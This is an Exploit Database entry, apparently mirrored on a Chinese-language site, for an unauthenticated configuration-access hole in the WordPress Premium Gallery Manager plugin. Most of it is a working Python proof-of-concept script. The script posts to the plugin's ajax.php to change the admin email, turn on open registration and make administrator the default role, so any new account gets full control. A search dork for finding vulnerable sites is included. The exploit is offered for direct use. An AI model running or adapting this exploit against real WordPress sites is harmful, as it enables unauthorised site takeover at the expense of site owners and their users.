WordPress Plugin Premium Gallery Manager – Configuration Access

• Exploit Database
• 14 阅读

• 作者： Hannaichi
  日期： 2014-09-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34538/

• #Exploit Title : WordPress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
  #Author : Hannaichi [@dntkun]
  #Date : February 5th, 2014
  #Type : php, html, htm, asp, etc.
  #Category : Web Applications
  #Vulnerability : Unauthenticated Configuration Access
  #Tested On : Windows 7 32-bit | Google Chrome 
  
  #Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
  
  #Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
  
  #POC : 
  Save File As Python (.py) = 
  import httplib, urllib
  
  #target site
  site = "victim" #<--- no http:// or https://
  #path to ajax.php
  url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
  
  def ChangeOption(site, url, option_name, option_value):
  params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
  headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
  conn = httplib.HTTPConnection(site)
  conn.request("POST", url, params, headers)
  response = conn.getresponse()
  print response.status, response.reason
  data = response.read()
  print data
  conn.close()
   
  ChangeOption(site, url, "admin_email", "youremail@test.com")
  ChangeOption(site, url, "users_can_register", "1")
  ChangeOption(site, url, "default_role", "administrator")
  print "Now register a new user, they are an administrator by default!"
  
  
  #Place It Broo No Lazy For This :D !!
  
  --------------------------------------------------------------------------------------------------------------------
  
  Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*